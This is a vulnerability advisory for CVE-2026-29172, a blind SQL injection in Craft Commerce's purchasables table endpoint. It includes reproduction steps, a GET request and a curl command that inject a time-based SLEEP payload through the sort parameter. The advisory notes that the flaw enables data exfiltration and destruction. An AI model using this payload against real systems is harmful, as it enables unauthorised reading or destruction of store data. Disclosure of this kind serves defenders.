CVE-2026-29172

Summary

Craft Commerce is vulnerable to SQL Injection in the purchasables table endpoint. The sort parameter is split by | and the first part (column name) is passed directly as an array key to orderBy() without whitelist validation. Yii2's query builder does NOT escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the ORDER BY clause.

---

PoC

Required Permissions

• General
  • Access the control panel
  • Access Craft Commerce
• Craft Commerce
  • Manage orders
  • Edit orders

Steps to reproduce

1. Log in to the control panel
2. Navigate to Commerce > Orders > Create a new order
3. Click on "Add a line item" to show the purchasables table
4. Intercept the AJAX request and modify the sort parameter as follows:

GET /index.php?p=admin/actions/commerce/orders/purchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(2))|asc

1. Observe the delay in the response, confirming the injection

Alternatively, you can use the following curl (bash syntax) command (replace cookie and target domain as needed):

curl --path-as-is -k -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0' -H $'Accept: application/json, text/plain, */*' -b $'<Cookie>' $'http://craft.local/index.php?p=admin%2Factions%2Fcommerce%2Forders%2Fpurchasables-table&siteId=1&sort=id,(SELECT%20SLEEP(5))|asc'

Impact

With this Blind SQLi, an attacker can:

• Exfiltrate data character-by-character (same technique as GHSA-pmgj-gmm4-jh6j).
• Modify or destroy data (drop tables, update records, alter schema).